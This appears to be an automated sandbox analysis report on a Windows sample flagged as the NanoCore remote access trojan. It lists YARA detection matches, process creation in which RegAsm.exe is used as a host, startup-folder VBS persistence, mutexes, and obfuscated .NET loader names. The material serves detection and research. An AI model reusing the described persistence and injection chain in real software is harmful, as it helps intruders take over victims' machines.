      Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000003.00000002.513552281.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_002610000_2_00261000
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_0026B7350_2_0026B735
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00D045150_2_00D04515
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0528E4713_2_0528E471
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0528E4803_2_0528E480
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0528BBD43_2_0528BBD4
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB10007_2_00AB1000
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00ABB7357_2_00ABB735
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_010D45157_2_010D4515
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeBinary or memory string: OriginalFilename vs 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.261116621.0000000002BB6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.256211245.0000000002D3F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000002.269032372.0000000000C90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunobservant.exe6 vs 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000000.242599852.0000000000275000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameunobservant.exe6 vs 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeBinary or memory string: OriginalFilenameunobservant.exe6 vs 692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: ople.exe.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeVirustotal: Detection: 72%
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeMetadefender: Detection: 41%
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeReversingLabs: Detection: 73%
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeFile read: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeJump to behavior
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe "C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe"
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe"
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\user\AppData\Roaming\etwa\ople.exe.exe
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exe" Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\etwa\ople.exe.exe C:\Users\user\AppData\Roaming\etwa\ople.exe.exeJump to behavior
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Users\user\AppData\Roaming\etwa\ople.exe.exeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeFile created: C:\Users\user\AppData\Roaming\etwaJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@10/4@12/2
      Source: 12.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 12.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1720:120:WilError_01
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{3b5167aa-3858-4f80-81dc-688e9982fe68}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_01
      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs"
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: wntdll.pdbUGP source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255855415.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255315849.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.293078354.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.291812090.0000000002E50000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255855415.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000003.255315849.0000000002A90000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.293078354.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, ople.exe.exe, 00000007.00000003.291812090.0000000002E50000.00000004.00001000.00020000.00000000.sdmp
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

      Data Obfuscation

      barindex
      .NET source code contains potential unpacker
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 3.0.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 12.2.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 12.0.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: 12.0.RegAsm.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_002627F6 push ecx; ret 0_2_00262809
      Source: C:\Users\user\AppData\Roaming\etwa\ople.exe.exeCode function: 7_2_00AB27F6 push ecx; ret 7_2_00AB2809
      Source: 3.2.RegAsm.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
